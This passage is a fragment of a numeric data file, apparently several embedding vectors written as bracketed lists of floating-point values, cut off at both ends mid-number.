.03784285,0.021828813,0.011923075,0.10730198,-0.017835204,0.007827027,-0.026995,0.015677495,-0.04433858,-0.058560323,-0.00006321782,-0.022624325,-0.031621166],[-0.0054032775,0.047903035,-0.11568343,-0.098533265,0.070255615,-0.018703282,0.027941514,0.05040829,0.015242449,-0.021841228,-0.025953513,0.028063308,0.084044926,0.042380117,0.007872874,-0.0011185346,-0.03727726,-0.05350485,-0.02377425,0.040351637,-0.021212922,0.02075495,-0.007659333,-0.01118643,0.03913565,-0.010330555,-0.026183046,-0.06021127,-0.015879294,-0.017687289,0.021571277,-0.07080032,-0.0013494178,-0.0177573,-0.06752875,-0.06007542,0.047652233,0.05851851,0.03439525,0.03172633,0.048880067,0.075065546,-0.01589245,-0.0045238677,0.0024981317,-0.008812872,0.0061036143,0.026306055,0.04565828,-0.10646574,0.028391749,-0.061086,0.03872884,-0.020415511,0.09185097,0.0764179,0.032074876,0.0012264585,0.0048123207,0.012963664,0.028060457,0.045424514,-0.079579584,0.08694251,-0.035189383,-0.018563677,-0.073552854,0.064245634,-0.019102514,-0.058028817,0.04626533,-0.0039902898,-0.025362121,0.03832392,-0.06769018,-0.010357488,-0.019527324,0.00012546749,0.014324879,0.032928307,-0.022596909,-0.0032218704,0.071414836,0.02160274,0.017981235,0.014458234,-0.0137317,-0.010340107,-0.023276882,0.06336043,0.029363327,-0.05399581,0.021977918,0.019139133,-0.049293723,-0.015642395,-0.004886869,0.045999967,-0.043185867,-0.0281336,-0.051410712,-0.015356791,0.005441048,-0.017621476,0.06281166,0.044229623,0.014445881,-0.011335773,-0.025966112,0.004247208,-0.032358285,0.06397344,-0.030164251,-0.012431528,-0.010696396,-0.07550338,0.024548505,0.0054929466,0.021003108,0.00091617665,-0.0060514617,0.0021229452,0.013720686,-0.014819544,0.030025035,0.0056696762,-0.04940982,0.008302535,0.015249019,-0.057420734,-0.026109505,-0.009620373,-0.041593853,0.004930715,0.00087056536,0.036923725,-0.028062351,-0.008284634,0.043766145,0.03990704,0.036212172,0.017275365,-0.02500587,-0.06647858,-0.0013098677,-0.09088835,0.020565081,-0.047923286,-0.013288806,-0.02106168,-0.026054092,0.04070044,-0.0064204214,0.018342378,0.00501552,0.030686479,0.042510986,-0.01852364,0.0062393625,0.04404304,0.033405103,0.03334113,-0.07120169,0.011069375,-0.04336597,-0.05082383,0.029530147,-0.0031841856,-0.01797339,0.028219197,-0.08909944,-0.02318302,-0.0023280561,-0.006286749,0.028947908,0.041319188,0.052182656,-0.0417475,-0.018848889,0.01578772,0.001807125,-0.053684365,0.045286767,-0.013232566,0.003976542,0.01561838,-0.010364157,-0.03425634,-0.0149971,-0.00460013,0.0013821066,0.03352869,0.02158681,0.023179619,-0.044603806,-0.04215148,0.031203726,-0.008751369,0.0070109908,0.008171218,-0.016766546,-0.026875777,-0.03685216,0.040359717,-0.05258187,0.038887195,-0.01752873,0.02757208,-0.048688315,0.027384408,0.054300517,-0.0082420325,0.015333649,-0.0027117864,-0.011363599,0.04262895,0.012553751,0.049898192,-0.024741573,-0.010581476,-0.0023765375,-0.005809213,0.00837936,-0.007433027,0.0025708803,0.008328928,-0.023148036,0.016089821,-0.037170906,0.022289427,0.017950248,-0.08124155,0.0563583,-0.0017364799,0.045749944,0.021704774,0.022458391,0.051014207,0.0158169,0.03440098,-0.017162098,0.006293721,-0.030775217,0.02364803,-0.028066952,0.009769273,-0.013434875,-0.04910879,-0.012376547,0.052118655,-0.00746737,0.00846205,0.024538407,-0.05602258,0.0316494,-0.018197116,-0.013145088,-0.0071756598,0.02572206,0.05271258,-0.005425196,-0.04599218,-0.007535629,-0.030836755,-0.03888754,-0.05821093,0.012988244,0.009638139,-0.003934946,0.028789304,0.005670931,0.038915746,0.038386296,0.0023301109,0.0032460876,0.013394262,-0.0656439,-0.034570806,-0.011572438,0.051801242,-0.039050534,-0.011078712,-0.03697907,0.005784572,0.0060575996,0.028891072,-0.014965602,0.014220135,0.03924163,0.004420671,-0.01039491,0.008178759,-0.032096125,0.0694989,-0.04229014,0.008147935,0.04347716,0.036082696,-0.006858914,-0.034278568,0.03424541,0.07741362,0.0354581,0.04674274,0.015849793,0.011410924,-0.0025667439,-0.044816375,0.04393304,-0.017185254,-0.04063087,0.0061998195,-0.050561447,0.010405681,-0.012310151,0.058048315,0.008876288,0.012010296,0.007493216,-0.03372672,-0.008624301,-0.022116087,0.036956117,-0.01886175,-0.021854425,0.04609461,-0.060274605,0.016274784,-0.0073950505,-0.016563859,0.02769813,0.018220995,-0.0034129394,-0.017590834,-0.038677394,0.010593377,0.020105602,0.0075968076,-0.011970036,-0.007313223,0.06184481,0.0054515065,0.04606315,-0.03943162,-0.015494615,0.024614776,-0.09523784,-0.049921967,0.03198174,0.04045771,-0.035587687,0.028571503,-0.023938153,-0.009758738,0.0047390126,0.024497166,0.04832668,0.01891286,0.0069471374,-0.04222451,0.060015228,-0.007276137,-0.016198227,-0.02995445,0.033531055,0.012222371,0.033508502,-0.0033556025,-0.00983666,0.014845469,-0.03174505,-0.006266729,-0.023815084,0.02218723,-0.01929845,-0.037160337,-0.07948613,0.006339355,-0.0035296998,-0.014472817,-0.042227387,0.0011807967,0.0014853321,0.018463274,0.057072297,0.0116022555,0.03151961,-0.001940712,0.007540991,0.070904896,-0.011972252,0.026015893,-0.004245521,0.01361226,0.05791128,-0.022334045,-0.001841333,0.030492539,-0.03795455,0.034371298,-0.011589402,-0.081885,0.029997138,0.0076817833,-0.006422504,-0.017357618,-0.012059403,-0.0016543274,0.056594174,0.014944533,0.059686165,0.021371257,-0.026454698,-0.03375884,-0.0065399413,-0.0015593529,0.078060664,-0.0035614504,-0.027543204,-0.010380331,0.019571207,0.032458257,-0.0054910593,0.02394286,0.037140884,0.025245724,0.015214945,0.030831125,-0.021606987,-0.06609363,-0.00095023745,0.02720319,0.05919574,-0.000784246,0.00007117706,0.008261279,-0.007051141,0.07653874,0.015307232,0.03658772,-0.000689435,-0.05274258,-0.055418435,-0.047843795,0.04020101,0.03931387,0.06187948,-0.03903797,-0.045141187,0.015820371,-0.0430273,0.06036981,0.045485858,0.028765125,0.09618558,-0.014126526,-0.06801043,0.0053491136,-0.008364371,-0.04363574,0.022469234,-0.0076620956,-0.06944119,0.015666917,0.014999424,-0.039075315,0.005260241,-0.03233207,0.026516853,0.081719294,-0.0408247,0.05357847,0.013875184,-0.033042613,0.041176572,0.029812234,-0.024156135,-0.013324442,0.020040082,0.040640865,-0.030217763,-0.034414217,-0.0038354632,0.0031784896,-0.028302722,0.06772158,0.019997211,0.0004394514,0.025505336,-0.011081529,0.07736289,-0.031199012,-0.0035186259,-0.023458427,-0.05473185,-0.027095044,0.005352349,0.06540968,-0.0136316065,0.06338951,-0.031295132,0.052520387,-0.023223707,0.028707406,0.03524825,-0.027800793,0.049173474,-0.017840752,-0.027936757,0.00020418692,0.035188954,-0.039364163,-0.030194934,0.015523103,0.08009356,-0.073202744,0.026788572,0.023793947,-0.015546455,0.008844658,-0.023655277,-0.035095003,-0.050988577,-0.048718695,0.0038868166,-0.02404202,0.023518832,-0.11390665,0.01446218,0.040674336,0.028370252,0.0637395,-0.035705164,-0.018432554,0.034484953,-0.002733464,-0.00042943278,0.0069391397,0.0010425176,0.053901117,0.0031061396,0.038920812,-0.019175813,0.01891551,-0.0012165868,0.010767384,0.02277684,0.058423195,0.016652929,-0.07261199,0.024911342,-0.03195332,-0.014846733,-0.04399458,0.06540892,-0.013875865,-0.043584947,-0.03559372,-0.013922615,-0.044617154,-0.009462876,0.03756641,0.018588832,0.022348534,-0.0065114093,-0.05408776,-0.017309533,-0.0092763845,0.03194513,0.055950217,0.035088867,-0.08676597,0.04170928,-0.024416458,-0.057184163,-0.013985476,0.0054431427,0.03566222,-0.046810016,-0.051289536,0.00027495957,-0.040181898,0.03317461,0.028825328,-0.030956678,-0.0030108346,-0.036673162,0.008176115,0.019024417,-0.006106507,-0.009024324,-0.0031705683,0.034926478,-0.023426862,-0.017914167,-0.041706685,-0.025129285,0.0149947405,-0.071973294,-0.103556365,0.022844788,0.03968129,0.07612606,-0.038685415,0.0046349927,0.10062381,0.010043015,0.02129544,-0.019257158,-0.014579778,-0.0074535795,0.016004538,-0.03799841,0.000008174177,-0.00021563003,-0.057105657,0.045550793,0.0067793922,0.013031483,-0.023305308,-0.03587018,-0.06120789,0.06176944,-0.09230576,0.008028756,-0.021609182,-0.017405378,-0.02625052,0.010735075,0.009494307,-0.05691018,0.007360692,-0.053089995,-0.001734885,-0.024421874,0.028207423,-0.017676797,0.030035557,-0.038360704,0.03682131,-0.003363106,0.0123918895,0.03960301,0.050797205,0.03882057,-0.018245041,0.037950773,0.07208052,0.05119805,-0.035725303,0.08926913,0.06770855,-0.010718634,0.017224912,0.024417447,-0.008324688,0.015701948,-0.021220885,-0.04591049,-0.009183115,0.0046058814,-0.005937393,-0.058181945,-0.04227557,-0.011363161,-0.0021162105,0.028439226,-0.021316914,-0.025011996,0.019995933,0.051270798,-0.011677341,0.0048389193,-0.04199947,0.06398104,0.015888741,0.0073229433,0.04961624,-0.0060348567,-0.06650848,0.06085855,-0.023133676,0.027814198,-0.024524815,-0.0013349513,-0.04518996,-0.007220978,0.0013819113,-0.0586046,-0.011687329,-0.009004707,-0.030963415,0.04085958,-0.024167353,0.04726055,-0.00457041,0.0151417535,0.044176903,-0.024023898,0.008886708,-0.031326488,0.003858508,-0.011581226,0.010936772,-0.04468483,-0.04202459,0.049138945,0.02072012,-0.009708344,-0.06173576,0.011742536,0.040733717,-0.044217158,0.04824806,0.00014475916,-0.00009615262,-0.029111437,-0.035624743,-0.049191814,0.029684475,0.018617123,-0.04530098,-0.024612091,-0.0141165685,-0.051860962,0.015793074,0.04061635,-0.04486325,0.010663728,0.01286185,0.01085799,-0.014034376,-0.02356073,0.030225566,0.022117889,0.03223063,-0.013020326,-0.0302193,-0.067167506,-0.05345433,-0.014521771,0.0002985045,0.0042213392,0.00801257,-0.029848559,-0.024088832,-0.03717992,0.028542606,0.011239097,-0.018634988,0.0012438748,-0.029942162,-0.01736168,0.027912678,-0.016411917,0.006230605,-0.015966363,0.04898123,0.113111086,-0.024240207,0.0039717755,0.004694986,0.004376026,-0.045367498,-0.0069529344,0.00021223225,-0.021979088,-0.031943947],[0.04942292,0.058258373,-0.11777372,-0.046975564,0.12251596,0.0056084506,0.010299019,0.036859594,-0.0041581756,-0.016237104,-0.04512512,0.011519075,0.08823803,0.040460356,0.009803304,-0.014210812,0.004563928,-0.05930361,0.015587964,0.037396673,-0.043246754,-0.038474336,-0.02805066,-0.052165687,0.04733853,0.043217223,-0.019493137,-0.0321226,-0.03528184,-0.02981439,0.021000251,-0.018944401,-0.06338889,-0.005598243,-0.068266585,-0.05535093,0.055300225,0.067832425,-0.019250542,0.013318005,0.06989879,0.047698837,-0.009908982,-0.044958573,-0.027053447,0.0011579922,-0.026917385,0.0050193043,0.062407225,-0.08903941,0.047054265,-0.08232807,0.047052078,0.0043615885,0.077458456,-0.0023732556,-0.013232003,-0.0108495485,-0.02109877,-0.05770715,0.015685465,0.076661214,-0.086257614,0.0891481,-0.009037495,0.0047303187,-0.055873964,0.04210631,0.001896501,-0.044209,0.033650927,-0.022152726,-0.043077268,0.021410594,-0.013659095,-0.0023107766,-0.038693197,-0.079515025,0.035003442,0.020729737,0.01880737,0.005725758,0.07630603,-0.0044368445,0.055528697,-0.028405938,-0.04263766,-0.018914962,-0.012835668,0.06879215,-0.0034510284,-0.0074973474,0.013662999,0.012988402,-0.03911218,0.0021464229,-0.032712225,0.005894601,-0.048428666,0.0034216219,-0.04429196,-0.019293508,0.028809456,0.021330226,-0.012868491,0.08568049,0.044195555,-0.019934857,0.010549521,-0.049097355,0.0038462295,0.072129086,0.007525824,-0.00813315,-0.026347121,-0.03215253,0.054384455,-0.0034974,0.00066741195,0.007825926,-0.02319806,-0.011903075,-0.043325733,0.050516743,-0.008843474,0.020603903,-0.032744635,-0.0041554826,-0.0068528047,-0.014521446,-0.034420084,0.017700572,-0.0068283887,-0.011790556,0.03410712,0.09546461,-0.016479822,-0.03277702,-0.0011380222,-0.021733535,0.035827972,0.04745885,-0.008602541,-0.029230991,-0.0074084788,-0.09797219,-0.013945983,0.011429248,-0.018026326,0.006696761,-0.0017957026,0.035937972,-0.027542487,0.006305189,0.008230107,0.0066921986,0.02722963,-0.00094024546,0.0046150973,0.03022592,0.04193816,0.028614225,-0.06266527,0.04106738,-0.021516357,-0.046346694,-0.0012591912,-0.0054991147,-0.02928759,0.029615933,-0.056491055,0.002477231,0.02426097,-0.030777488,-0.0018718188,-0.00044541887,0.049010143,-0.045524795,-0.008975357,-0.045029983,-0.00035464074,-0.018438904,0.042999797,-0.0016911562,-0.024874892,0.022556614,-0.0013921086,-0.037535623,0.035188325,-0.007276975,-0.0049066483,0.017624058,-0.03986062,-0.0011006462,-0.035996627,-0.050949845,0.0033611332,-0.0023660797,0.039176516,-0.017367674,-0.04137206,-0.0395217,-0.031475347,-0.0009977298,-0.049437318,0.047355715,-0.02738774,0.06404697,-0.020606516,0.047683325,0.06425241,-0.0031996674,0.024566486,-0.031343505,0.006778592,-0.0069197672,-0.016855842,0.0049250647,-0.04305586,-0.021930723,0.0051014354,0.0048512015,-0.01115539,0.025239479,0.010864906,0.015740266,-0.0441069,0.0047135293,-0.03872397,0.0005326533,-0.0011100423,-0.1304977,0.021828849,-0.008733637,-0.022206094,0.03385591,0.025404003,0.05102053,-0.005940801,0.024017474,-0.020747267,0.033797342,-0.056996647,0.038381547,-0.041936237,-0.01939565,-0.025888776,-0.077885844,-0.040128406,0.07686319,-0.028263308,0.012867762,0.02154301,-0.014903541,0.05078834,0.008651443,-0.01141452,0.0024565356,0.017335987,0.05162707,0.027105922,-0.028542383,-0.036529373,-0.032683637,-0.07409648,-0.054904707,-0.043645456,-0.0071510575,0.035484366,0.0065743267,0.0062208003,0.06394189,0.024190523,0.03544974,-0.014402098,0.04596292,-0.023269938,-0.032437436,-0.0096794395,0.020944353,-0.036512844,0.025754523,-0.013844008,-0.04121538,0.03545426,0.025643555,0.01902177,0.0070373532,0.022819834,-0.032426655,0.031678453,-0.021134013,-0.04400094,0.046170037,-0.008087153,0.026088016,0.014727003,-0.010795263,0.009821198,-0.05380176,0.082058065,0.05021948,0.050074514,0.055442665,-0.016336236,-0.013407199,0.025380319,-0.01702101,0.032140337,-0.031898018,-0.06874482,0.008190932,-0.05125266,0.024518633,0.026623568,0.043317948,0.019339433,0.04704412,0.020158963,-0.015712028,0.0020579852,-0.026697718,0.01675026,-0.004351502,-0.010852661,0.04176894,-0.016580157,-0.013381672,-0.0040336996,-0.021269958,0.05917151,0.028187346,0.037795093,-0.033596005,-0.01833987,0.009142199,0.026911162,0.043020412,0.023145666,-0.013251909,0.063744076,-0.0004149492,0.033258706,-0.018624913,0.013336598,0.025265776,-0.08880575,-0.04949268,0.04105492,0.07073286,-0.0005510943,-0.016000204,-0.030961437,-0.017935803,0.030082455,-0.00796029,0.019614702,0.05254986,0.02111205,-0.022913722,0.05607342,0.033373203,0.029399127,-0.014915137,0.0033280267,0.05512133,0.049850654,0.009646922,-0.03592488,0.017236616,-0.020598385,-0.066879764,-0.013612769,0.026040513,-0.0164688,0.0132634705,-0.03118446,0.01965089,-0.03517264,0.025379302,-0.022850126,-0.049169257,0.009483555,0.018838758,0.033919778,0.033306673,0.018434858,-0.058558468,-0.0028553926,0.0605549,0.025937641,0.0068689096,-0.024619421,0.029650846,0.027523965,-0.036696814,0.005893576,0.03972607,-0.015293365,0.08282104,0.0047337255,-0.021933852,0.014840935,0.01998962,-0.010542843,-0.0057709427,-0.033912618,-0.0028450836,-0.00017858726,-0.016064728,0.010548658,0.026060678,-0.054761607,-0.03280923,0.03191252,0.028426902,0.026857179,0.009265593,-0.028772,-0.027562497,0.035110045,0.016176222,-0.011496517,-0.0035494638,0.017743228,0.04300496,0.018571198,0.05905764,-0.0046334006,-0.06978672,0.05191256,0.02053646,0.020138143,-0.00052124815,0.013602173,0.026830554,-0.007203197,0.080433056,0.020865107,0.044115473,0.028860621,-0.05205687,-0.041206125,-0.043334372,0.03110875,0.012010329,0.054119915,-0.027014915,-0.086564206,0.011533578,-0.0025598907,0.054613113,0.036172267,0.051731814,0.064948,-0.016667206,0.01824473,-0.002205821,0.016091993,-0.002738317,0.021951756,-0.0036618845,-0.03521706,0.036996804,0.022516502,-0.01634455,0.0021569685,-0.025335621,0.014071307,0.020550055,-0.034028918,-0.014297286,-0.01703694,-0.018726157,-0.008335784,0.019904241,0.0010005089,-0.0044872756,0.01452362,0.06992596,0.0061661443,-0.040655445,-0.011020454,-0.042262375,-0.027149253,0.03619296,-0.0012442514,0.012721925,-0.022217542,-0.022309406,-0.0003952666,0.042443562,-0.016191656,-0.00079395354,-0.07453873,-0.032646377,0.021272443,0.044826765,0.050065413,0.029298196,0.013116092,0.02680508,0.017632429,0.011333978,-0.022539899,-0.005179672,0.07952439,-0.057006598,-0.041577708,-0.0020890557,0.047560174,-0.006998948,0.013854117,0.0377289,0.041443344,-0.07599227,-0.0022004466,-0.0018610382,-0.054985013,0.009765821,0.01213867,-0.021333225,-0.04326401,-0.043688107,-0.05810094,-0.002821286,-0.0040710103,-0.1004792,0.023711847,0.030640833,0.01667597,0.05927684,-0.048289884,0.007997377,0.0541832,0.01351102,-0.018408747,0.0028439744,0.0024897305,0.019764427,-0.0034171876,0.015503601,-0.009045844,-0.01413999,0.060770076,0.0059569366,0.024777733,0.047074042,-0.016740238,-0.108332194,0.015270352,-0.057143513,0.041834198,-0.046009343,0.070220575,0.0065535656,-0.002880641,-0.032725494,-0.03937745,-0.10637886,-0.018959574,0.0028109048,0.035936777,0.026611142,-0.0037271609,-0.044398613,-0.014186619,0.007410423,0.017506242,0.05128248,0.0143389385,-0.019231198,0.03612101,-0.008342509,-0.0022078308,-0.009451982,0.023429632,-0.004656499,-0.03473634,-0.06447361,0.042074904,-0.06196796,0.036982104,0.041318774,0.029863378,-0.012407909,-0.06281811,0.021106733,0.014043252,-0.0076220473,0.023147667,-0.03916517,0.018635806,-0.030675502,0.0069076857,-0.015339746,0.0048919637,-0.012422869,-0.05602879,-0.08637702,0.012985059,0.05041663,0.014260126,-0.050434634,0.055337623,0.063991845,0.027141375,0.042010143,-0.01877107,0.017401284,-0.0035140917,0.043775853,0.029032463,-0.013982309,0.007224349,-0.06598558,0.02660965,-0.00357587,-0.01584634,-0.031790186,0.010211244,-0.021554358,0.08472202,-0.04347385,0.031096626,-0.023845168,0.0011130958,-0.0011731918,-0.025213512,0.020267708,-0.05441015,0.009630416,-0.022324273,-0.038096096,-0.07619632,0.0048266905,-0.0026060771,0.0049750754,-0.020871775,0.033493243,0.037269816,-0.033345588,0.0019058364,0.039696664,0.027243577,-0.0064858375,-0.018581392,0.07435153,0.02002548,-0.006089476,0.0524559,0.09323238,-0.004483219,0.005527547,-0.0021971033,-0.010203447,0.027850922,0.0032401732,-0.019286001,0.018962365,0.026520729,-0.04083529,-0.008160264,-0.014883834,0.010538033,-0.014837636,-0.010578044,0.028115343,0.01320875,-0.032726284,0.022957498,0.008735779,0.03947098,-0.06176523,-0.00091330387,-0.00329592,0.025123203,0.03137416,0.048437733,-0.036244772,0.03309055,0.009721148,0.027311428,-0.041291285,0.014572373,-0.059166692,0.032506287,-0.012384181,-0.056089982,0.013746655,-0.02262366,-0.03114043,0.020404452,-0.004675291,-0.013054651,-0.014255379,-0.028177684,0.012329368,-0.006343952,0.033144288,0.019285211,0.0029721328,-0.033386786,0.018545525,-0.0063083856,0.028894253,0.04213248,0.013966634,-0.011748367,-0.049993474,0.0029319648,0.027083568,-0.08430798,0.027602952,0.0060083563,0.012352877,-0.0025846933,-0.039385945,-0.029104287,-0.010785423,-0.03018099,-0.011171665,-0.04700354,-0.036289725,0.0076872716,0.016133787,0.052884817,-0.049816027,0.017728705,0.01575147,-0.01386286,-0.042592634,-0.045873027,0.043462284,0.004527151,0.029658662,0.0037032592,0.0026573406,-0.09318632,-0.023987282,-0.045080356,0.03817176,-0.028103575,-0.0073643792,-0.012634897,-0.04828555,-0.055453584,0.046335008,-0.013851188,-0.06235837,-0.0065193344,-0.02463301,-0.033705294,-0.004888582,-0.024763353,0.008167368,0.01808165,0.016993081,0.10401126,-0.021482093,0.0019907346,-0.03841729,0.07722226,0.00096519117,-0.023045553,-0.035955034,0.0089287665,-0.06420471],[0.033492416,0.07665644,-0.1270988,-0.050173145,0.11384759,0.034452353,-0.006920623,0.03645835,-0.008300021,0.004360955,-0.03668894,0.034412663,0.073089056,0.02379681,0.028551465,-0.022205578,-0.0031048066,-0.05591766,-0.000748402,0.035380125,-0.051128246,-0.051085435,-0.03925334,-0.04738757,0.062098514,0.043026153,-0.025680264,-0.028837284,-0.021134892,-0.049977787,0.027593026,-0.008971983,-0.051846094,0.010604177,-0.076570705,-0.056815423,0.04933798,0.06770685,-0.0021745504,0.02270702,0.08717775,0.046508793,0.0041003604,-0.036159895,-0.035401653,0.010148329,-0.018196654,0.01531192,0.05046522,-0.08358841,0.056362398,-0.08048725,0.04664344,0.04787439,0.07121849,0.013737687,-0.0047829254,-0.018405164,-0.019215805,-0.051465333,0.017015198,0.07894787,-0.075197354,0.0839908,0.009350855,-0.006927932,-0.0510441,0.035836346,0.006868158,-0.05670538,0.025476173,-0.022319121,-0.033860065,0.016442213,-0.014432249,0.02280977,-0.012416816,-0.06472425,0.025516985,0.030295694,0.018792557,0.029615698,0.0832015,-0.0068028946,0.0630111,-0.03141604,-0.031941622,-0.03360213,-0.026791643,0.062318873,0.0075046765,-0.007875183,0.010324192,-0.0014236128,-0.026470691,-0.00454384,-0.04089375,0.014783417,-0.050197538,0.030731304,-0.042306602,-0.011975103,0.017892566,0.021343984,-0.004806393,0.08394212,0.03767995,-0.029467236,-0.00551041,-0.03262484,-0.0002720372,0.061451428,0.00186481,-0.014658514,-0.028609943,-0.03019796,0.04022411,-0.024604667,0.015771456,0.016980454,-0.02884023,-0.0017659593,-0.069206156,0.062208753,-0.015923861,0.006287534,-0.043275632,0.0010875075,-0.018661713,-0.01492712,-0.029439505,0.028613808,-0.0015242576,-0.011925169,0.03689871,0.097605474,0.00007298452,-0.03354129,0.011000924,-0.0067604366,0.04039125,0.051753465,-0.0064272927,-0.039214093,-0.011395251,-0.08748356,-0.015876893,0.0064767557,-0.03227802,0.019189682,0.002702137,0.035891067,-0.031589545,0.024644624,-0.014753386,0.023744358,0.014032404,0.013553748,0.005230758,0.013515535,0.03648651,0.025769996,-0.06336138,0.04972154,-0.026470462,-0.054916676,0.017735489,-0.0062893787,-0.052759994,0.0392719,-0.04976402,-0.011951231,0.02236103,-0.03051192,0.0033065137,-0.02860477,0.032393236,-0.041085362,-0.019499486,-0.049779613,0.0112330215,-0.024714967,0.030445533,-0.008819134,-0.02466348,0.018025821,-0.02194724,-0.010666184,0.03178361,-0.019119563,-0.011073422,0.02195326,-0.048388906,-0.013981082,-0.026827177,-0.05162835,-0.000385592,0.0009285166,0.021987444,-0.016452175,-0.049398895,-0.040514626,-0.044165146,-0.0014036177,-0.03869037,0.05132149,-0.041584276,0.050341178,-0.014238227,0.042017654,0.056310937,-0.011321463,0.039088793,-0.026776455,0.011489721,-0.018120358,-0.0071250866,-0.008851423,-0.030848129,-0.021991704,-0.005970069,0.0066177296,-0.0072835227,0.04032023,0.029437155,0.009306944,-0.042352878,0.004758737,-0.044848133,-0.010434034,-0.008480036,-0.120504044,0.022424866,-0.021602103,-0.03258077,0.032871183,0.03378284,0.04749994,-0.012580461,0.013761006,-0.0148394015,0.02749558,-0.0578119,0.05141867,-0.033134516,-0.028236588,-0.02225056,-0.084525965,-0.019364843,0.08349297,-0.026346723,0.0018718085,0.024806656,-0.008032642,0.05355104,0.016563162,-0.024042582,0.014389015,0.03132779,0.04213903,0.019038174,-0.043225642,-0.038221132,-0.027188491,-0.06098316,-0.04010317,-0.035818886,-0.003018542,0.023797685,-0.0022182192,0.0062945457,0.048055343,0.014377585,0.0462761,-0.0026932831,0.027765786,-0.03824381,-0.02935056,-0.01174071,0.0061384463,-0.047272537,0.021535655,-0.022112094,-0.04110107,0.03582921,0.023259234,0.019464867,0.0042455546,0.019647159,-0.04132001,0.02547622,-0.02503706,-0.043226805,0.0475048,-0.012418326,0.02188812,-0.0036529095,-0.009866022,0.00824411,-0.06761145,0.090162836,0.04525741,0.039904855,0.062308624,-0.0092025455,-0.0051828427,0.025060987,-0.010656886,0.039299604,-0.035181034,-0.06959734,0.007327385,-0.050438944,0.013968912,0.023077555,0.04595545,0.019765671,0.04569132,0.029109228,-0.014574643,-0.014460226,-0.0515026,0.0066337627,-0.0110970875,-0.00968425,0.032868177,-0.028701602,-0.01842189,0.0032133285,-0.03130628,0.04469264,0.027175382,0.050674252,-0.036011353,-0.023803681,0.011748452,0.04905308,0.050811373,0.015366724,0.014886266,0.046972834,0.00049121067,0.028981207,-0.019938866,0.012805745,0.011978057,-0.0767372,-0.036932953,0.049663026,0.050922684,-0.007186089,-0.0163031,-0.0314999,-0.011438766,0.018233843,-0.0050391755,0.010143737,0.04110247,0.02004459,-0.023170387,0.047680337,0.013866299,0.027073521,-0.023039723,0.010314019,0.055744737,0.04457551,0.0054585496,-0.028172718,0.010148686,-0.03976525,-0.056824785,-0.021997355,0.029005589,-0.009851464,-0.009578371,-0.04240483,0.03028342,-0.05326571,0.04277083,-0.011994493,-0.034667525,0.0041580396,0.01985693,0.035635725,0.027608037,0.027607616,-0.048523426,-0.01201058,0.037437342,0.02411632,0.019099278,-0.031703457,0.026666021,0.04060107,-0.05311769,-0.00816284,0.03581149,-0.0129194595,0.08291926,-0.0028653182,-0.03509448,0.015413384,0.019924162,-0.0059346426,-0.016478674,-0.0331134,0.007799794,-0.0030755356,-0.0082854545,0.005805017,0.04521623,-0.04494221,-0.048956495,0.019247819,0.048772268,0.01728118,0.016678855,-0.026693502,-0.015101903,0.033926003,0.013701275,-0.0052405302,-0.0075753457,0.012809003,0.033592742,0.030657858,0.06193888,-0.01945006,-0.07328325,0.048635103,0.028790211,0.028954148,0.0032493367,0.02713489,0.029757567,-0.002798944,0.088696085,0.01407855,0.039950933,0.014368653,-0.05042349,-0.035107236,-0.050775263,0.02113867,0.01291005,0.049163543,-0.020474667,-0.095822826,0.0052375267,-0.0061480333,0.03833441,0.026881862,0.04350872,0.070430726,-0.01041322,0.028021432,0.0026024978,0.015860638,-0.006335981,0.010847433,-0.014291199,-0.03819122,0.036242492,0.018853884,-0.020274514,-0.0101107685,-0.027670493,0.011152547,0.00067920674,-0.038478997,-0.006498681,-0.03391412,-0.02610909,-0.011737084,0.0111803375,0.0026344354,-0.0017130557,0.011403268,0.073423915,0.010889973,-0.03368763,-0.008028282,-0.030023484,-0.023272902,0.033070184,0.009093097,0.0152329635,-0.022268737,-0.021441506,0.010261699,0.0272382,-0.009862085,0.0037587536,-0.07092211,-0.01944245,0.021352883,0.055808056,0.03091376,0.04172446,0.010774658,0.04523146,0.021649722,0.0043341634,-0.0143684,-0.0033151265,0.08308856,-0.03388442,-0.046488985,0.003390662,0.06612682,-0.0017908121,0.014329106,0.021334179,0.041242402,-0.06861475,-0.01928393,-0.008235762,-0.04601187,0.01952272,0.021017395,-0.018532434,-0.033626303,-0.0618026,-0.07365803,-0.015381334,0.014642785,-0.09399841,0.0076855547,0.017177371,0.014329992,0.05010589,-0.055120546,0.016412051,0.05516176,0.02124972,-0.025181465,-0.0058749067,0.011504599,0.027289761,0.010547572,0.013156354,0.0055395733,-0.022494141,0.06538256,0.014622438,0.008295621,0.051534615,0.0030312256,-0.09114481,0.010856324,-0.037764654,0.020727692,-0.033207536,0.05288577,-0.017364038,0.012134149,-0.025414027,-0.035560284,-0.09742595,-0.011972548,0.033314344,0.05027614,0.02769977,-0.02317078,-0.03022493,-0.01607053,-0.004398535,0.013007115,0.058678556,0.02454095,-0.022754218,0.01854192,-0.005226839,0.006479656,-0.008383938,0.020932302,-0.018743614,-0.033403516,-0.07474901,0.02441542,-0.049645565,0.040113214,0.045140587,0.033951316,-0.011992901,-0.0624091,0.02642104,-0.005963223,-0.01194762,0.017348919,-0.039882366,0.014503307,-0.039482,0.001438744,-0.0085142935,0.005225681,-0.011263319,-0.067922816,-0.10447228,0.014179438,0.03613786,0.01770723,-0.05718846,0.05519225,0.047745846,0.0074751205,0.04115539,-0.010914873,0.01733831,0.012427159,0.046587158,0.025125433,-0.00011672318,0.020078605,-0.061694887,0.053850003,0.0042732223,-0.03237238,-0.005990409,0.014055401,-0.03459676,0.0673603,-0.046755392,0.03749356,-0.037506677,-0.021890098,-0.010584882,-0.022991138,0.035348725,-0.052444413,0.0044100652,-0.01997704,-0.031310655,-0.060996287,0.017322024,-0.010135999,0.0060147764,-0.010584413,0.028588751,0.034648407,-0.03648461,0.0026969372,0.043812864,0.040636048,-0.008984076,-0.020979097,0.08191209,0.010893373,-0.008693463,0.040600084,0.06687917,-0.012203312,-0.003913986,0.0041160327,-0.022790557,0.03535658,0.009492451,-0.022290587,0.018234795,0.018648703,-0.026904404,-0.011197739,-0.012927065,0.028701246,-0.018150244,0.005230088,0.013469398,0.015506745,-0.03716271,0.038968753,0.02503044,0.03206516,-0.073422045,0.004924777,0.01578707,0.058750667,0.03191759,0.04020296,-0.036480073,0.034258313,0.018985314,0.023345843,-0.036605515,0.010103759,-0.051166594,0.026464015,-0.024236254,-0.05441552,0.03093986,-0.023662396,-0.07301463,0.018102901,-0.00047250921,0.010464991,-0.017074581,-0.028236449,0.006798595,-0.0017837882,0.03690066,0.020686077,0.011842556,-0.032385863,0.032846387,-0.016740592,0.035128623,0.04978906,0.041662343,-0.0098838415,-0.054456603,0.0007334225,0.032006167,-0.07351542,0.028182756,0.0005175136,-0.